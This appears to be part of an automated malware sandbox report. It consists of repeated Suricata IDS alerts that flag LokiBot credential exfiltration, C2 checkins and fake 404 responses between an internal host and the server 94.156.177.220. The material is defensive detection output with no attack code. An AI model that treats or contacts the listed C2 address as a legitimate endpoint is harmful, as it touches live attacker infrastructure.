        Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49179 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49213 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49215 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49215 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49215 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49207 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49207 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49215 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49215 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49215
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49186
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49214 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49202 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49202 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49202 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49207
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49214 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49214 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49202 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49202 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49192 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49199 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49192 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49195 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49192 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49202
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49199 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49211 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49211 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49211 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49199 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49199 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49195 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49194 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49195 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49211 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49194 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49214 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49194 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49195 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49195 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49199
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49192 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49192 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49214 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49205 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49194 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49194 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49205 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49205 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49183 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49205 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49183 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49205 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49205
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49189 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49189 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49189 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49212 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49214
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49213 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49212 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49196 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49212 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49196 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49189 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49189 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49212 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49212 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49212
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49189
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49213 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49213
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49196 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49196 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49201 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49201 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49195
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49183 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49201 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49201 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49192
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49194
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49182 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49216 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49216 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49216 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49196
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49182 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49182 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49216 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49216 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49226 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49226 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49226 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49216
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49226 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49226 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49222 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49222 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49222 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49226
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49222 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49222 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49244 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49222
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49244 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49244 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49219 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49219 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49219 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49244 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49244 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49200 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49200 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49221 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49244
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49221 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49200 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49221 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49183 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49218 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49183 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49230 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49230 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49230 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49247 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49183
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49247 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49221 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49225 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49256 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49225 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49256 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49225 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49256 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49235 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49235 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49235 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49256 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49256 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49235 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49182
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49235 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49220 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49220 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49220 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49247 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49256
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49230 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49230 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49247 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49220 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49247 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49185 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49221 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49225 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49231 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49231 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49231 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49221
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49247
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49255 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49255 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49255 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49234 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49234 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49220 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49234 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49238 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49220
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49238 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49238 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49210 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49210 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49210 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49235
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49231 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49218 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49233 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49231 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49185 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49230
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49234 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49231
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49225 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49234 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49254 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49254 -> 94.156.177.220:80
